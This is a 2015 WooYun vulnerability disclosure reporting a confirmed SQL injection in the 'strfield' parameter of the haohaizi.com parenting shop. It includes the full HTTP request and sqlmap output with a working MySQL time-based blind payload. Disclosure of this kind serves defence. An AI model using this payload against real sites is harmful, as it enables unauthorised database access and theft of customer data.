当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120509

漏洞标题:好孩子育儿网某处SQL注入(12库 涉及大量表以及内容)

相关厂商:好孩子育儿网

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-14 23:40

修复时间:2015-07-30 17:22

公开时间:2015-07-30 17:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-14: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商已经确认,细节仅向厂商公开
2015-06-25: 细节向核心白帽子及相关领域专家公开
2015-07-05: 细节向普通白帽子公开
2015-07-15: 细节向实习白帽子公开
2015-07-30: 细节向公众公开

简要描述:

天地本不仁 万物为刍狗(涉及的表太多了 跑起来慢 就没跑了)

详细说明:

POST 数据包:

GET /article-help-getvisitororder.html?t=1434284989451&mode=3&strfield=13800138000 HTTP/1.1
Host: www.haohaizi.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://www.haohaizi.com/article-help-visitororders.html
Cookie: origins=%5B%7B%22utm_source%22%3A%22linktech%22%2C%22utm_medium%22%3A%22cps%22%2C%22utm_term%22%3Anull%2C%22utm_content%22%3Anull%2C%22utm_campaign%22%3Anull%2C%22create_time%22%3A1434284937%2C%22expired_time%22%3A1435494537%2C%22other%22%3A%7B%22adid%22%3A%22shichangcps%22%2C%22cid%22%3A%221636%22%2C%22fbt%22%3A%22A100202883%7C2390474880000E%5E20150614202714-80627%7C99999%7C01%7C%22%7D%7D%5D; vary=77b9f63c97b5ce99c6d26b76c12e347726a340f2657fb48326076630b12a0082; _jzqa=1.897618466894645600.1434284871.1434284871.1434284871.1; _jzqb=1.3.10.1434284871.1; _jzqc=1; _jzqx=1.1434284871.1434284871.1.jzqsr=click%2Elinktech%2Ecn|jzqct=/.-; _jzqckmp=1; __utma=101467934.1657353480.1434284871.1434284871.1434284871.1; __utmb=101467934.2.10.1434284871; __utmc=101467934; __utmz=101467934.1434284871.1.1.utmcsr=linktech|utmccn=(not%20set)|utmcmd=cps; __utmv=101467934.|3=ADID=shichangcps=1; Hm_lvt_53a0d71dba66835ff1aa907db99144d8=1434284872; Hm_lpvt_53a0d71dba66835ff1aa907db99144d8=1434284893; Hm_lvt_4c7ef74c5005ae3d162bbb46e1a5a502=1434284875; Hm_lpvt_4c7ef74c5005ae3d162bbb46e1a5a502=1434284892; s=43d77f2b115789066d4882150043031e; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; isVisitor=1; user1=10000000; _qzja=1.1084372355.1434284871142.1434284871142.1434284871143.1434284871143.1434284891118..0.0.2.1; _qzjb=1.1434284871142.2.0.0.0; _qzjc=1; _qzjto=2.1.0; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1434284965; loginName=%E6%B8%B8%E5%AE%A2%E8%B4%AD%E7%89%A9%E4%B8%93%E7%94%A8; UNAME=%E6%B8%B8%E5%AE%A2%E8%B4%AD%E7%89%A9%E4%B8%93%E7%94%A8; MLV=1; S[MEMBER]=10000000
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive


strfield 参数可注入(因之前我用我手机号测的 没改 所以 下面我已打码 具体参数见下图以及漏洞证明)

0.png


共 12 个数据库

1.png


2.png


3.png


4.png

漏洞证明:

GET parameter 'strfield' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] n
sqlmap identified the following injection points with a total of 108 HTTP(s) req
uests:
---
Parameter: strfield (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: t=1434284989451&mode=3&strfield=13800138000' AND (SELECT * FROM (SE
LECT(SLEEP(5)))zLJp) AND 'Qxdq'='Qxdq
---
[20:42:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[20:42:48] [INFO] fetching database names

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-15 17:20

厂商回复:

感谢对好孩子的关注,我们会尽快修复漏洞

最新状态:

暂无